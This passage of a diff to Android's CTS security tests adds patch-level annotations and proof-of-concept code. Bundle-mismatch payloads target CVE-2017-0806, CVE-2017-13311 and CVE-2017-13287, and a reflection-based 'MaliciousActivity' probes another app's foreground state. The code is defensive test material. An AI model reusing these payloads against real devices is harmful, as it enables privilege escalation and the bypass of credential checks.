Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index 5a65d41..7e57319 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -15,18 +15,50 @@
*/
package android.security.cts;
+import android.annotation.Nullable;
+import android.app.Activity;
+import android.app.ActivityManager;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.Handler;
import android.os.IBinder;
+import android.os.Process;
import android.platform.test.annotations.SecurityTest;
+import android.support.test.InstrumentationRegistry;
+import android.util.Log;
+import android.view.WindowManager;
+
import junit.framework.TestCase;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+
@SecurityTest
public class ActivityManagerTest extends TestCase {
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static CountDownLatch sLatch;
+ private static volatile int sNormalActivityUserId;
+ private static volatile boolean sCannotReflect;
+ private static volatile boolean sIsAppForeground;
+
+ private static final String TAG = "ActivityManagerTest";
+
@Override
protected void setUp() throws Exception {
super.setUp();
+
+ sLatch = new CountDownLatch(2);
+ sNormalActivityUserId = -1;
+ sCannotReflect = false;
+ sIsAppForeground = false;
}
+ @SecurityTest(minPatchLevel = "2015-03")
public void testActivityManager_injectInputEvents() throws ClassNotFoundException {
try {
/*
@@ -42,4 +74,117 @@
// Patched devices should throw this exception
}
}
+
+ public void testIsAppInForegroundNormal() throws Exception {
+ /* Verify that isAppForeground can be called by the caller on itself. */
+ launchActivity(NormalActivity.class);
+ sNormalActivityUserId = InstrumentationRegistry.getTargetContext().getPackageManager()
+ .getPackageUid(SECURITY_CTS_PACKAGE_NAME, 0);
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertTrue("isAppForeground failed to query for uid on itself.", sIsAppForeground);
+ }
+
+ public void testIsAppInForegroundMalicious() throws Exception {
+ /* Verify that isAppForeground cannot be called by another app on a known uid. */
+ launchActivity(MaliciousActivity.class);
+ launchSettingsActivity();
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertFalse("isAppForeground successfully queried for a uid other than itself.",
+ sIsAppForeground);
+ }
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ private void launchSettingsActivity() {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(android.provider.Settings.ACTION_SETTINGS);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ public static class NormalActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, sNormalActivityUserId);
+ startService(intent);
+ }
+ }
+
+ public static class MaliciousActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, Process.SYSTEM_UID);
+ startService(intent);
+ finish();
+ }
+ }
+
+ public static class AppMonitoringService extends Service {
+
+ private static final String EXTRA_UID = "android.security.cts.extra.UID";
+ private int uid;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ uid = intent.getIntExtra(EXTRA_UID, -1);
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ public AppMonitoringService() {
+ super.onCreate();
+
+ final Handler handler = new Handler();
+ handler.postDelayed(new Runnable() {
+ public void run() {
+ try {
+ ActivityManager activityManager = (ActivityManager) getSystemService(
+ ACTIVITY_SERVICE);
+ Field field = activityManager.getClass().getDeclaredField(
+ "IActivityManagerSingleton");
+ field.setAccessible(true);
+ Object fieldValue = field.get(activityManager);
+ Method method = fieldValue.getClass().getDeclaredMethod("create");
+ method.setAccessible(true);
+ Object IActivityInstance = method.invoke(fieldValue);
+ Method isAppForeground = IActivityInstance.getClass().getDeclaredMethod(
+ "isAppForeground", int.class);
+ isAppForeground.setAccessible(true);
+ boolean res = (boolean) isAppForeground.invoke(IActivityInstance, uid);
+ if (res) {
+ sIsAppForeground = true;
+ }
+ } catch (Exception e) {
+ Log.e(TAG, "Failed to fetch/invoke field/method via reflection.", e);
+ sCannotReflect = true;
+ }
+ sLatch.countDown();
+ handler.postDelayed(this, 200);
+
+ }
+ }, 0);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ throw new UnsupportedOperationException("Not yet implemented");
+ }
+ }
}
\ No newline at end of file
diff --git a/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java b/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
index f8a2a8f..df1018a 100644
--- a/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
+++ b/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
@@ -32,6 +32,7 @@
* Verifies that the device is not vulnerable to ANDROID-19270126: Android
* BitmapFactory.decodeStream JPG allocPixelRef integer overflow
*/
+ @SecurityTest(minPatchLevel = "2015-03")
public void testAllocateJavaPixelRefIntOverflow() {
InputStream exploitImage = mContext.getResources().openRawResource(
R.raw.cve_2015_1531_b_19270126);
diff --git a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
index dc74708..47dc8f3 100644
--- a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
+++ b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
@@ -33,117 +33,322 @@
public class AmbiguousBundlesTest extends AndroidTestCase {
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void test_android_CVE_2017_0806() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("android.service.gatekeeper.GateKeeperResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ Parcel p = Parcel.obtain();
+ p.writeInt(0);
+ p.writeInt(0);
+
+ Parcel p2 = Parcel.obtain();
+ stuffToInject.writeToParcel(p2, 0);
+ int p2Len = p2.dataPosition() - BUNDLE_SKIP;
+
+ for (int i = 0; i < p2Len / 4 + 4; i++) {
+ int paddingVal;
+ if (i > 3) {
+ paddingVal = i;
+ } else {
+ paddingVal = random.nextInt();
+ }
+ p.writeInt(paddingVal);
+
+ }
+
+ p.appendFrom(p2, BUNDLE_SKIP, p2Len);
+ p2.recycle();
+
+ while (p.dataPosition() % 8 != 0) p.writeInt(0);
+ for (int i = 0; i < 2; i++) {
+ p.writeInt(0);
+ }
+
+ int len = p.dataPosition() / 2 - 1;
+ p.writeInt(0); p.writeInt(0);
+ p.setDataPosition(0);
+ p.writeInt(len);
+ p.writeInt(len);
+ p.setDataPosition(0);
+ String result = p.readString();
+ p.recycle();
+ return result;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+
+
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void test_android_CVE_2017_13311() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size(), minHash, random);
+ padBundle(preReSerialize, postReSerialize.size(), minHash, random);
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 1);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_OBJECTARRAY);
+ parcel.writeInt(3);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.app.procstats.ProcessStats");
+
+ parcel.writeInt(PROCSTATS_MAGIC);
+ parcel.writeInt(PROCSTATS_PARCEL_VERSION);
+ parcel.writeInt(PROCSTATS_STATE_COUNT);
+ parcel.writeInt(PROCSTATS_ADJ_COUNT);
+ parcel.writeInt(PROCSTATS_PSS_COUNT);
+ parcel.writeInt(PROCSTATS_SYS_MEM_USAGE_COUNT);
+ parcel.writeInt(PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE);
+
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeString(null);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ for (int i = 0; i < PROCSTATS_ADJ_COUNT; i++) {
+ parcel.writeInt(0);
+ }
+
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(VAL_LONGARRAY);
+ parcel.writeString("AAAAA");
+ parcel.writeInt(0);
+
+ parcel.writeInt(VAL_INTEGER);
+ parcel.writeInt(0);
+ parcel.writeInt(VAL_BUNDLE);
+ parcel.writeBundle(postReSerialize);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ return null;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-04")
public void test_android_CVE_2017_13287() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ Parcel p = Parcel.obtain();
+ p.writeInt(0);
+ p.writeInt(0);
+
+ Parcel p2 = Parcel.obtain();
+ stuffToInject.writeToParcel(p2, 0);
+ int p2Len = p2.dataPosition() - BUNDLE_SKIP;
+
+ for (int i = 0; i < p2Len / 4 + 4; i++) {
+ int paddingVal;
+ if (i > 3) {
+ paddingVal = i;
+ } else {
+ paddingVal = random.nextInt();
+ }
+ p.writeInt(paddingVal);
+
+ }
+
+ p.appendFrom(p2, BUNDLE_SKIP, p2Len);
+ p2.recycle();
+
+ while (p.dataPosition() % 8 != 0) p.writeInt(0);
+ for (int i = 0; i < 2; i++) {
+ p.writeInt(0);
+ }
+
+ int len = p.dataPosition() / 2 - 1;
+ p.writeInt(0); p.writeInt(0);
+ p.setDataPosition(0);
+ p.writeInt(len);
+ p.writeInt(len);
+ p.setDataPosition(0);
+ String result = p.readString();
+ p.recycle();
+ return result;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ private void testAmbiguator(Ambiguator ambiguator) {
Bundle bundle;
- {
- Bundle verifyMe = new Bundle();
- verifyMe.putString("cmd", "something_safe");
- Bundle useMe = new Bundle();
- useMe.putString("cmd", "replaced_thing");
- Ambiguator a = new Ambiguator() {
- @Override
- public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
- Random random = new Random(1234);
- int minHash = 0;
- for (String s : preReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
- for (String s : postReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
+ Bundle verifyMe = new Bundle();
+ verifyMe.putString("cmd", "something_safe");
+ Bundle useMe = new Bundle();
+ useMe.putString("cmd", "replaced_thing");
- String key;
- int keyHash;
+ try {
+ bundle = ambiguator.make(verifyMe, useMe);
- do {
- key = randomString(random);
- keyHash = key.hashCode();
- } while (keyHash >= minHash);
+ bundle = reparcel(bundle);
+ String value1 = bundle.getString("cmd");
+ bundle = reparcel(bundle);
+ String value2 = bundle.getString("cmd");
- padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
- padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
-
- String key2;
- int key2Hash;
- do {
- key2 = makeStringToInject(postReSerialize, random);
- key2Hash = key2.hashCode();
- } while (key2Hash >= minHash || key2Hash <= keyHash);
-
-
- Parcel parcel = Parcel.obtain();
-
- parcel.writeInt(preReSerialize.size() + 2);
- parcel.writeString(key);
-
- parcel.writeInt(VAL_PARCELABLE);
- parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
-
- parcel.writeInt(0);
- parcel.writeInt(0);
-
- parcel.writeString(key2);
- parcel.writeInt(VAL_NULL);
-
- writeBundleSkippingHeaders(parcel, preReSerialize);
-
- parcel.setDataPosition(0);
- Bundle bundle = new Bundle();
- parcelledDataField.set(bundle, parcel);
- return bundle;
- }
-
- @Override
- protected String makeStringToInject(Bundle stuffToInject, Random random) {
- Parcel p = Parcel.obtain();
- p.writeInt(0);
- p.writeInt(0);
-
- Parcel p2 = Parcel.obtain();
- stuffToInject.writeToParcel(p2, 0);
- int p2Len = p2.dataPosition() - BUNDLE_SKIP;
-
- for (int i = 0; i < p2Len / 4 + 4; i++) {
- int paddingVal;
- if (i > 3) {
- paddingVal = i;
- } else {
- paddingVal = random.nextInt();
- }
- p.writeInt(paddingVal);
-
- }
-
- p.appendFrom(p2, BUNDLE_SKIP, p2Len);
- p2.recycle();
-
- while (p.dataPosition() % 8 != 0) p.writeInt(0);
- for (int i = 0; i < 2; i++) {
- p.writeInt(0);
- }
-
- int len = p.dataPosition() / 2 - 1;
- p.writeInt(0); p.writeInt(0);
- p.setDataPosition(0);
- p.writeInt(len);
- p.writeInt(len);
- p.setDataPosition(0);
- String result = p.readString();
- p.recycle();
- return result;
- }
- };
- bundle = a.make(verifyMe, useMe);
- }
-
- bundle = reparcel(bundle);
- String value1 = bundle.getString("cmd");
- bundle = reparcel(bundle);
- String value2 = bundle.getString("cmd");
-
- if (!value1.equals(value2)) {
- fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ if (!value1.equals(value2)) {
+ fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ }
+ } catch (Exception e) {
}
}
@@ -159,10 +364,23 @@
static abstract class Ambiguator {
- protected static final int VAL_PARCELABLE = 4;
protected static final int VAL_NULL = -1;
+ protected static final int VAL_INTEGER = 1;
+ protected static final int VAL_BUNDLE = 3;
+ protected static final int VAL_PARCELABLE = 4;
+ protected static final int VAL_OBJECTARRAY = 17;
+ protected static final int VAL_INTARRAY = 18;
+ protected static final int VAL_LONGARRAY = 19;
protected static final int BUNDLE_SKIP = 12;
+ protected static final int PROCSTATS_MAGIC = 0x50535454;
+ protected static final int PROCSTATS_PARCEL_VERSION = 21;
+ protected static final int PROCSTATS_STATE_COUNT = 14;
+ protected static final int PROCSTATS_ADJ_COUNT = 8;
+ protected static final int PROCSTATS_PSS_COUNT = 7;
+ protected static final int PROCSTATS_SYS_MEM_USAGE_COUNT = 16;
+ protected static final int PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE = 4096;
+
protected final Field parcelledDataField;
public Ambiguator() throws Exception {
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
index 3495191..56cff46 100644
--- a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -90,6 +90,7 @@
}
// b/28173666
+ @SecurityTest(minPatchLevel = "2016-07")
public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
testAllEffects("get parameter attempt offload",
new TestEffect() {
@@ -103,6 +104,7 @@
// b/32438594
// b/32624850
// b/32635664
+ @SecurityTest(minPatchLevel = "2017-03")
public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
testAllEffects("get parameter2 attempt offload",
new TestEffect() {
@@ -114,6 +116,7 @@
}
// b/30204301
+ @SecurityTest(minPatchLevel = "2016-10")
public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
testAllEffects("set parameter attempt offload",
new TestEffect() {
@@ -125,6 +128,7 @@
}
// b/37536407
+ @SecurityTest(minPatchLevel = "2017-01")
public void testAllEffectsEqualizer_CVE_2017_0401() throws Exception {
testAllEffects("equalizer get parameter name",
new TestEffect() {
@@ -351,6 +355,7 @@
private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
// b/31781965
+ @SecurityTest(minPatchLevel = "2017-03")
public void testVisualizerCapture_CVE_2017_0396() throws Exception {
// Capture params
final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
diff --git a/tests/tests/security/src/android/security/cts/BannedFilesTest.java b/tests/tests/security/src/android/security/cts/BannedFilesTest.java
index 8847a84..46b5ba9 100644
--- a/tests/tests/security/src/android/security/cts/BannedFilesTest.java
+++ b/tests/tests/security/src/android/security/cts/BannedFilesTest.java
@@ -148,6 +148,24 @@
assertNotSetugid("/vendor/bin/tcpdump-arm");
}
+ /**
+ * enforce that the xaac codec has not been included on the device
+ */
+ public void testNoXaac() {
+ String libraries[] = new String[] {
+ "libstagefright_soft_xaacdec.so", "libstagefright_soft_c2xaacdec.so"
+ };
+ String directories[] = new String[] {
+ "/system/lib", "/system/lib64", "/vendor/lib", "/vendor/lib64"
+ };
+ for (String f : libraries) {
+ for (String d : directories) {
+ String fullPath = d + "/" + f;
+ assertFalse(fullPath, new File(fullPath).exists());
+ }
+ }
+ }
+
private static void assertNotSetugid(String file) {
FileUtils.FileStatus fs = new FileUtils.FileStatus();
if (!FileUtils.getFileStatus(file, fs, false)) {
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
index f3c2302..bcfb1df 100644
--- a/tests/tests/security/src/android/security/cts/BigRleTest.java
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -22,6 +22,7 @@
import java.io.InputStream;
+import android.platform.test.annotations.SecurityTest;
import android.security.cts.R;
public class BigRleTest extends AndroidTestCase {
@@ -31,6 +32,7 @@
* This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
* we attempted to allocate space for all the encoded data at once, resulting in OOM.
*/
+ @SecurityTest(minPatchLevel = "2017-04")
public void test_android_bug_33251605() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java b/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
index 1fa0b65..ce28a7a 100644
--- a/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
@@ -33,6 +33,7 @@
* to heap corruption by trying to open a crafted PNG image with incorrect
* npTc chunk.
*/
+ @SecurityTest(minPatchLevel = "2015-01")
public void testNinePatchHeapOverflow() throws Exception {
InputStream inStream = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.cve_2015_1532));
@@ -40,13 +41,14 @@
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testPocCVE_2017_0691() throws Exception {
InputStream exploitImage = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.cve_2017_0691));
BitmapFactory.decodeStream(exploitImage);
}
+ @SecurityTest(minPatchLevel = "2017-12")
public void test_b65290323() throws Exception {
InputStream exploitImage = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.b65290323));
diff --git a/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java b/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
index 2272dc0..8ffe485 100644
--- a/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
+++ b/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
@@ -58,6 +58,7 @@
/**
* Verifies that decoding a corrupt ICO does crash.
*/
+ @SecurityTest(minPatchLevel = "2017-09")
public void test_android_bug_38116746() {
FileDescriptor exploitImage = getResource(R.raw.bug_38116746);
try {
@@ -73,6 +74,7 @@
/**
* Verifies that decoding a corrupt BMP does crash.
*/
+ @SecurityTest(minPatchLevel = "2017-08")
public void test_android_bug_37627194() {
FileDescriptor exploitImage = getResource(R.raw.bug_37627194);
try {
diff --git a/tests/tests/security/src/android/security/cts/BitmapTest.java b/tests/tests/security/src/android/security/cts/BitmapTest.java
index 6253f0a..632ab96 100644
--- a/tests/tests/security/src/android/security/cts/BitmapTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapTest.java
@@ -33,6 +33,7 @@
* OOME is more appropriate.
*/
@Test(expected=OutOfMemoryError.class)
+ @SecurityTest(minPatchLevel = "2018-01")
public void test_33846679() {
// This size is based on the max size possible in a GIF file,
// which might be passed to createBitmap from a Java decoder.
diff --git a/tests/tests/security/src/android/security/cts/BrowserTest.java b/tests/tests/security/src/android/security/cts/BrowserTest.java
index de8763e..becbc5e 100644
--- a/tests/tests/security/src/android/security/cts/BrowserTest.java
+++ b/tests/tests/security/src/android/security/cts/BrowserTest.java
@@ -138,6 +138,7 @@
/**
* See Bug 6212665 for detailed information about this issue.
*/
+ @SecurityTest(minPatchLevel = "2012-01")
public void testBrowserPrivateDataAccess() throws Throwable {
// Yucky workaround to let us launch file:// Uris
StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder().build());
diff --git a/tests/tests/security/src/android/security/cts/DecodeTest.java b/tests/tests/security/src/android/security/cts/DecodeTest.java
index 0e92310..3314166 100644
--- a/tests/tests/security/src/android/security/cts/DecodeTest.java
+++ b/tests/tests/security/src/android/security/cts/DecodeTest.java
@@ -32,7 +32,7 @@
* Prior to fixing bug 34778578, decoding this file would crash. Instead, it should fail to
* decode.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void test_android_bug_34778578() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_34778578);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
@@ -45,7 +45,7 @@
* Prior to fixing bug 67381469, decoding this file would crash. Instead, it should fail to
* decode.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void test_android_bug_67381469() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_67381469);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
index ae55494..d1baf37 100644
--- a/tests/tests/security/src/android/security/cts/EffectBundleTest.java
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -48,6 +48,7 @@
private static final int intSize = 4;
//Testing security bug: 32436341
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamCenterFreq() throws Exception {
if (!hasEqualizer()) {
return;
@@ -57,6 +58,7 @@
}
//Testing security bug: 32588352
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamCenterFreq_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -65,6 +67,7 @@
}
//Testing security bug: 32438598
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamBandLevel() throws Exception {
if (!hasEqualizer()) {
return;
@@ -73,6 +76,7 @@
}
//Testing security bug: 32584034
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamBandLevel_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -81,6 +85,7 @@
}
//Testing security bug: 32247948
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamFreqRange() throws Exception {
if (!hasEqualizer()) {
return;
@@ -90,6 +95,7 @@
}
//Testing security bug: 32588756
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamFreqRange_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -99,6 +105,7 @@
}
//Testing security bug: 32448258
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamPresetName() throws Exception {
if (!hasEqualizer()) {
return;
@@ -107,6 +114,7 @@
}
//Testing security bug: 32588016
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamPresetName_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -147,6 +155,7 @@
}
//testing security bug: 32095626
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_setParamBandLevel() throws Exception {
if (!hasEqualizer()) {
return;
@@ -162,6 +171,7 @@
}
//testing security bug: 32585400
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_setParamBandLevel_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -177,6 +187,7 @@
}
//testing security bug: 32705438
+ @SecurityTest(minPatchLevel = "2017-02")
public void testEqualizer_getParamFreqRangeCommand_short() throws Exception {
if (!hasEqualizer()) {
return;
@@ -186,6 +197,7 @@
}
//testing security bug: 32703959
+ @SecurityTest(minPatchLevel = "2017-02")
public void testEqualizer_getParamFreqRangeCommand_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -195,6 +207,7 @@
}
//testing security bug: 37563371 (short media)
+ @SecurityTest(minPatchLevel = "2017-09")
public void testEqualizer_setParamProperties_short() throws Exception {
if (!hasEqualizer()) {
return;
@@ -204,6 +217,7 @@
}
//testing security bug: 37563371 (long media)
+ @SecurityTest(minPatchLevel = "2017-09")
public void testEqualizer_setParamProperties_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -213,7 +227,7 @@
}
//Testing security bug: 63662938
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testDownmix_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
EFFECT_TYPE_DOWNMIX, new int[] { DOWNMIX_PARAM_TYPE });
@@ -229,7 +243,7 @@
private static final int DOWNMIX_PARAM_TYPE = 0;
//Testing security bug: 63526567
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testEnvironmentalReverb_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
AudioEffect.EFFECT_TYPE_ENV_REVERB, new int[] {
@@ -249,7 +263,7 @@
}
//Testing security bug: 67647856
- @SecurityTest
